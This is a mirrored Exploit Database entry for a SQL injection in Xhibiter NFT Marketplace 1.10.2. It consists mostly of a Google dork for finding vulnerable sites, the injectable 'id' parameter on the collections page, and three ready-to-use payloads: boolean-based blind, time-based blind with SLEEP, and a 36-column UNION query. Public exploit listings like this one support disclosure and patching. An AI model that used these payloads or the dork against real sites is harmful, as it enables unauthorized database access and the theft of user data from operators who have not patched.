Xhibiter NFT Marketplace 1.10.2 – SQL Injection

• Exploit Database
• 826 阅读

• 作者： Sohel Yousef
  日期： 2024-07-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/52060/

• # Exploit Title: xhibiter nft marketplace SQLI
  # Google Dork: intitle:"View - Browse, create, buy, sell, and auction NFTs"
  # Date: 29/06/204
  # Exploit Author: Sohel yousef - https://www.linkedin.com/in/sohel-yousef-50a905189/
  # Vendor Homepage: https://elements.envato.com/xhibiter-nft-marketplace-html-template-AQN45FA
  # Version: 1.10.2
  # Tested on: linux 
  # CVE : [if applicable]
  
  on this dir 
  https://localhost/collections?id=2
  xhibiter nft marketplace suffers from SQLI 
  
  ---
  Parameter: id (GET)
  Type: boolean-based blind
  Title: AND boolean-based blind - WHERE or HAVING clause
  Payload: id=2' AND 4182=4182 AND 'rNfD'='rNfD
  
  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: id=2' AND (SELECT 1492 FROM (SELECT(SLEEP(5)))HsLV) AND 'KEOa'='KEOa
  
  Type: UNION query
  Title: MySQL UNION query (NULL) - 36 columns
  Payload: id=2' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162626271,0x655465754c50524d684f764944434458624e4e596c614b6d4a56656f495669466d4b704362666b58,0x71716a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  ---